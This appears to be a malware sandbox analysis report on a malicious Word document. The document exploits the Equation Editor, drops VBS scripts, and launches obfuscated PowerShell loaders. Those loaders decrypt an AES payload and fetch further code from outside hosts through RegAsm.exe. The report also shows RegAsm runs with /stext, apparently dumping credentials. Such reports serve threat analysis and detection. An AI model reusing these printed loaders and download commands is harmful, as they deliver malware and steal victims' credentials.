            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....4.......@..........................................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.....j.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8..................................s............8.......".......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............(..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............:..........................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............F..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............X..........................s..............9.....`.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............d..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....4.......@...............v..........................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.....j.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8..................................s............8.......".......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............#..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............5..........................s..............9.....`.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............A..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....4.......@...............S..........................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..............._..........................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.....j.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8..................................s............8.......".......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............!..........................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............-..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............?..........................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............K..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............]..........................s..............9.....`.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............i..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....4.......@...............{..........................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.....j.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8..................................s............8.......".......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............(..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............:..........................s..............9.....`.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............F..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....4.......@...............X..........................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............d..........................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.....j.......P...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8..................................s............8.......".......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.....`.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............#..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....4.......@...............5..........................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............A..........................s............8...............................
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3604
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3888
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.424856116.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: RegAsm.exe, 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwnuifnnlmnppbptlmxfdtbrgppi"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uqsnjxygzufcshdfcxkgggwipdhrwsi"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uqsnjxygzufcshdfcxkgggwipdhrwsi"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\fkyx"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr 